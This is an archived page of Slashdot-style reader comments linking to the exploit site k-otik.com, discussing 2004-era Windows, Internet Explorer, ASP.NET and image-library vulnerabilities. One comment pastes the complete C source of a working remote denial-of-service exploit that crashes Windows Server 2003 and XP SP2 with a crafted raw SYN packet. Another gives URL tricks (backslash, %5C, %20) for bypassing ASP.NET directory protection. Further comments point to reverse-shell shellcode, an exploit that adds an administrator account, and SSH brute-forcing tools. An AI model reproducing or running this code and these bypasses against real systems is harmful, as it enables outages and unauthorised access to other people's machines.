Domain: k-otik.com
Stories and comments across the archive that link to k-otik.com.
Comments · 20
-
exploitCourtesy of the fine (French) folk at k-otik.org... an exploit.
Unfortuntately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected
:? -
ExploitCourtesy of the fine (French) folk at k-otik.org... an exploit. Curse this slashcode lameness filter...
#define _BSD_SOURCE #include #include #include #include #include #include #include #include #include #include #include
/* Windows Server 2003 and XP SP2 remote DoS exploit Tested under OpenBSD 3.6 at WinXP SP 2 Vuln by Dejan Levaja (c)oded by __blf 2005 RusH Security Team , http://rst.void.ru Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy All rights reserved. */ //checksum function by r0ach u_short checksum (u_short *addr, int len) { u_short *w = addr; int i = len; int sum = 0; u_short answer; while (i > 0) { sum += *w++; i-=2; } if (i == 1) sum += *(u_char *)w; sum = (sum >> 16) + (sum & 0xffff); sum = sum + (sum >> 16); return (~sum); } int main(int argc, char ** argv) { struct in_addr src, dst; struct sockaddr_in sin; struct _pseudoheader { struct in_addr source_addr; struct in_addr destination_addr; u_char zero; u_char protocol; u_short length; } pseudoheader; struct ip * iph; struct tcphdr * tcph; int mysock; u_char * packet; u_char * pseudopacket; int on = 1; if( argc != 3) { fprintf(stderr, "r57windos.c by __blf\n"); fprintf(stderr, "RusH Security Team\n"); fprintf(stderr, "Usage: %s \n", argv[0]); return EX_USAGE; } if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } inet_aton(argv[1], &src); inet_aton(argv[1], &dst); iph = (struct ip *) packet; iph->ip_v = IPVERSION; iph->ip_hl = 5; iph->ip_tos = 0; iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); iph->ip_off = htons(IP_DF); iph->ip_ttl = 255; iph->ip_p = IPPROTO_TCP; iph->ip_sum = 0; iph->ip_src = src; iph->ip_dst = dst; tcph = (struct tcphdr *)(packet +sizeof(struct ip)); tcph->th_sport = htons(atoi(argv[2])); tcph->th_dport = htons(atoi(argv[2])); tcph->th_seq = ntohl(rand()); tcph->th_ack = rand(); tcph->th_off = 5; tcph->th_flags = TH_SYN; // setting up TCP SYN flag here tcph->th_win = htons(512); tcph->th_sum = 0; tcph->th_urp = 0; pseudoheader.source_addr = src; pseudoheader.destination_addr = dst; pseudoheader.zero = 0; pseudoheader.protocol = IPPROTO_TCP; pseudoheader.length = htons(sizeof(struct tcphdr)); if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(!mysock) { perror("socket!\n"); return EX_OSERR; } if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt"); shutdown(mysock, 2); return EX_OSERR; } sin.sin_family = PF_INET; sin.sin_addr = dst; sin.sin_port = htons(80); if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("sendto()\n"); shutdown(mysock, 2); return EX_OSERR; } printf("Packet sent. Remote machine should be down.\n"); shutdown(mysock, 2); return EX_OK; } -
The exploit.....
.....is already out.
-
Uhm...
I don't like typing URLs in manually with Internet Explorer, that's why I use Firefox.
Microsoft Not Worried about FireFox
Well, they should be. Let's not forget about the Remote Command Execution Exploit and the HTML Help Control Local Zone Bypass Exploit, all thanks to our favorite Microsoft browser, Internet Explorer. -
Uhm...
I don't like typing URLs in manually with Internet Explorer, that's why I use Firefox.
Microsoft Not Worried about FireFox
Well, they should be. Let's not forget about the Remote Command Execution Exploit and the HTML Help Control Local Zone Bypass Exploit, all thanks to our favorite Microsoft browser, Internet Explorer. -
Source code...
For those who're interesed in the source code of this Sanity.A worm: click.
-
Re:not much...
There are at least two other IE exploits out there that MS has not patched, and SP2 won't protect you. see: http://isc.sans.org/diary.php?date=2004-11-20 Quote: Two More IE Vulnerabilities Exploit code has been released for two more Internet Explorer vulnerabilities that were released on Wednesday (Nov. 17). This code would enable an attacker to trick users into executing malware. These vulnerabilities affect Microsoft Internet Explorer 6.0 SP2 and are not prevented by Windows XP SP2. The original advisory is here: http://secunia.com/advisories/13203/ The proof of concept exploit: http://www.k-otik.com/exploits/2041119.IESP2discl
o sure.php While on the topic, it is interesting to note some statistics that Secunia has been compiling about Internet Explorer vulnerabilities: IE 5.01 - 42 advisories (7 unpatched) http://secunia.com/product/9/ IE 5.5 - 55 advisories (8 unpatched) http://secunia.com/product/10/ IE 6.0 - 69 advisories (18 unpatched) http://secunia.com/product/11/ If you still think SP2 has mystical properties: http://www.safecenter.net/UMBRELLAWEBV4/ie_unpatch ed/ -
Details from the Internet Storm CenterMicrosoft announced a possible vulnerability in ASP.NET (www.microsoft.com/security/incident/aspnet.mspx)
.
There are not much details so far, but it refers to the "canonicalization" functionality and suggest to implement then hardening measures outlined in KB887459 (support.microsoft.com/?kbid=887459).It appears that a particularly crafted request may confuse ASP.Net and allow access to otherwise protected directories.
If a web server receives a request for a particular URL (e.g._http://server/somedirectory/filename), the 'somedirectory/filename' part has to be mapped to a particular file located on the server. This translation has been the source of many "directory traversal" bugs. The IIS unicode exploit is probably the most famous one.
After our original posting of this diary, a few users pointed to the following articles which provide more details then provided by Microsoft's advisory:
(Thanks to Chaouki & Daniel)www.heise.de/security/news/meldung/51730 (german)
http://www.derkeiler.com/Mailing-Lists/NT-Bugtraq/ 2004-09/0068.html
blogs.devleap.com/rob/archive/2004/10/02/1803.aspx (italian)
www.k-otik.com/news/10052004.ASPNETFlaw.php (french)It appears that by switching a '/' character in the URL with '\' or '%5C', the canonicalization routine will be confused. So if the URL: http://www.example.com/secure/file.apx is password protected, using the either of the following URLs will bypass the restriction: http://www.example.com/secure\file.apx http://www.example.com/secure%5Cfile.apx
In addition to the slash/back-slash confusion, one reader reports that inserting a space will bypass the URL restriction as well: http://www.example.com/%20/secure/file.apx (had no chance to validate this method so far)
URL Obfuscation
Handler and star SANS instructor Ed Skoudis compiled a comprehensive list of various URL obfuscation methods used in phishing schemes and spam. Some of these methods do not work with all browsers (e.g. the %01 issue in older Internet Explorer versions). In order to preserve the tricky details of some of these methods, we setup a page which includes just the URL methods without our usual header and footer:isc.sans.org/presentations/urlobfuscation.
p hp (to view as source: isc.sans.org/presentations/urlobfuscation.txt ).Jan Reilink wrote to point us to this page with more details about URL obfuscation and decoding:www.pc-help.org/obscure.htm .
-
Re:Patch is already out
Which isn't really that helpful, however, there's space for 2500 bytes of shell code (ie, lots of space left in the example on k-otik) for writing something with a reverse-shell - in fact, this has already been done, it just isn't public There's also a newer example on k-otik Which adds an administrator account to the system it runs on, however, you'll have to edit some of the code yourself - script-kiddy-proof.
-
Re:PNG too?
Some related exploits.
Windows JPEG: Windows JPEG Processing Buffer Overrun PoC Exploit (MS04-028)
Qt BMP: Qt 3.x bmp image parsing local buffer overflow Exploit
XV BMP XV v3.x bmp parsing local buffer overflow Exploit
GV Postscript: GV PostScript Viewer Remote Buffer overflow Exploit
LibPNG: LibPNG Graphics Library Remote Buffer Overflow Exploit
-
Re:PNG too?
Some related exploits.
Windows JPEG: Windows JPEG Processing Buffer Overrun PoC Exploit (MS04-028)
Qt BMP: Qt 3.x bmp image parsing local buffer overflow Exploit
XV BMP XV v3.x bmp parsing local buffer overflow Exploit
GV Postscript: GV PostScript Viewer Remote Buffer overflow Exploit
LibPNG: LibPNG Graphics Library Remote Buffer Overflow Exploit
-
Re:PNG too?
Some related exploits.
Windows JPEG: Windows JPEG Processing Buffer Overrun PoC Exploit (MS04-028)
Qt BMP: Qt 3.x bmp image parsing local buffer overflow Exploit
XV BMP XV v3.x bmp parsing local buffer overflow Exploit
GV Postscript: GV PostScript Viewer Remote Buffer overflow Exploit
LibPNG: LibPNG Graphics Library Remote Buffer Overflow Exploit
-
Re:PNG too?
Some related exploits.
Windows JPEG: Windows JPEG Processing Buffer Overrun PoC Exploit (MS04-028)
Qt BMP: Qt 3.x bmp image parsing local buffer overflow Exploit
XV BMP XV v3.x bmp parsing local buffer overflow Exploit
GV Postscript: GV PostScript Viewer Remote Buffer overflow Exploit
LibPNG: LibPNG Graphics Library Remote Buffer Overflow Exploit
-
Re:PNG too?
Some related exploits.
Windows JPEG: Windows JPEG Processing Buffer Overrun PoC Exploit (MS04-028)
Qt BMP: Qt 3.x bmp image parsing local buffer overflow Exploit
XV BMP XV v3.x bmp parsing local buffer overflow Exploit
GV Postscript: GV PostScript Viewer Remote Buffer overflow Exploit
LibPNG: LibPNG Graphics Library Remote Buffer Overflow Exploit
-
0day exploit in the wild
seems that this flaw was reported by the french website security company K-Otik (http://www.k-otik.com) who made this private exploit code goes to "public"
-
Re:SP2 - as secure as any linux distro...
Root? Unfortunately privilege escalation seems to very big problem which does not get as much attention as it deserves.
Its critical that you know and trust your users and take care of what applications you decide to run especially as plenty of exploits are readily available.
As for the spoofing "Security Center" it ignores the fact that evil.exe required a prerequisite compromise to have taken place.
-
Re:Many more SSH login attempts
I just found they're done by a program called brutessh2. It's a little brute-force scanner like everyone has guessed. You can find the source for it here. Be sure to check your passwords against its password list.
-
Re: The point everyone misses
-
An example: C code exploit for ASN.1 vulnRiclewis, I don't know if this fits your definition, but here is a piece of C code that crashes a Windows server by exploiting the ASN.1 vuln. Similar pieces of code have been floating for quite a while since at least October 2003. Some of them are rumored to give you a remote shell, which is not unbelievable.
Was this what you wanted?
-
Re:I'm in the dark ages...I'm still using 2.4.18!
It's strange this is modded +4 funny considering things such as this local root exploit for kernels before 2.4.20 are commonplace.
There are reasons for new releases, and few are funny.